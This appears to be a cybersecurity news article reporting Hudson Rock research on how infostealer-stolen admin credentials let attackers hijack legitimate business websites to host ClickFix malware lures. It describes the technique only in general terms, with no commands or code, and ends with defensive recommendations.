Threat Actors Use Infostealers to Turn Legitimate Businesses into Malware Hosts

Cybercriminals are exploiting a dangerous feedback loop where infostealer malware transforms legitimate businesses into unwitting accomplices in cybercrime.

Recent analysis by the Hudson Rock Threat Intelligence Team reveals that attackers are using stolen credentials to commandeer authentic business websites for hosting malicious ClickFix campaigns.

The ClickFix attack technique tricks users into executing malware by mimicking trusted system interfaces like CAPTCHA verifications or browser updates.

When victims interact with these fake prompts, malicious PowerShell commands are copied to their clipboard.

Users are then instructed to paste and execute these commands through the Windows Run dialog, bypassing traditional security controls.

Research conducted using the ClickFix Hunter platform uncovered a startling pattern: 220 out of 1,635 tracked malicious domains are legitimate business websites whose administrative credentials were previously stolen by infostealers.

This represents approximately 13% of active ClickFix infrastructure, demonstrating how victims become vectors for future attacks.

The investigation examined specific cases including jrqsistemas.com, where WordPress administrative credentials appeared in infostealer logs.

Attackers used these stolen credentials to access the legitimate website’s content management system and upload ClickFix scripts, transforming a business site into a malware distribution point.

This self-sustaining cycle operates as follows: infostealers compromise user machines and harvest credentials for website administration panels, hosting services, and content management systems.

Cybercriminals then use these stolen credentials to inject malicious code into legitimate websites. These compromised sites host new ClickFix campaigns that distribute more infostealers, perpetuating the cycle.

The approach proves particularly effective because compromised legitimate domains bypass many security filters.

Unlike newly registered domains that trigger suspicion, established business websites often maintain trusted reputations with security systems and users alike.

Security researchers emphasize that this infrastructure hijacking represents a significant shift in cybercrime economics.

Rather than purchasing domains and hosting services which creates paper trails and incurs costs attackers exploit stolen credentials to access existing infrastructure at no cost while maintaining operational anonymity.

Hudson Rock has released free API endpoints enabling security teams to detect whether their domains appear in infostealer logs, providing early warning of potential compromise.

According to Infostealers, the ClickFix Hunter platform integrates this intelligence to help organizations identify and remediate hijacked infrastructure.

The feedback loop highlights a critical vulnerability in modern cybersecurity: the human element combined with credential theft creates self-perpetuating attack ecosystems.

Organizations must implement comprehensive monitoring for unauthorized access to administrative systems and conduct regular credential audits to break this cycle.

Security experts recommend multi-factor authentication for all administrative access, regular monitoring of website file integrity, and employee training on recognizing social engineering tactics.

As infostealers continue evolving, breaking the victim-to-vector cycle requires proactive defense strategies that address both technical vulnerabilities and human factors.

Follow us on Google News , LinkedIn and X to Get More Instant Updates, Set Cyberpress as a Preferred Source in Google.

The post Threat Actors Use Infostealers to Turn Legitimate Businesses into Malware Hosts appeared first on Cyber Security News.